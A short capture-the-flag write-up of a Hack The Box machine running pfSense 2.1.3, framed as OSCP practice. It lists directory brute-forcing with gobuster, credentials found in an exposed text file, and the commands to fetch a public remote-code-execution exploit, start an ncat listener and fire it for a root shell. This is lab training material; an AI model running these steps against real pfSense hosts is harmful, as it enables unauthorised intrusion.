Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.
In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.
Let's start with the fun!
Initial Foothold
Port 80 redirects us to port 443 which holds a pfsense
Fuck this machine, you have to enumerate the webpage using the medium dirbuster wordlist and search
for txt
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -k -o gobuster/gobuster_txt.txt -x txt -t 50
With that, we find system-users.txt
which says:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
The actual credentials are: rohit:pfsense
From the gobuster bruteforce, we also find changelog.txt
which says there is an unpatched
Upon login, we see the version for pfsense
: 2.1.3
Doing searchsploit pfsense
we find one with remote code execution for versions < 2.1.4.
- Mirror it:
searchsploit -m 43560.py
. - Rename it:
mv 43560.py exploit.py
. - Set up a listener:
ncat -lnvp 12345
. - Fire the exploit:
python3 exploit.py --rhost --lhost --lport 12345 --username rohit --password pfsense
. - We get a root shell.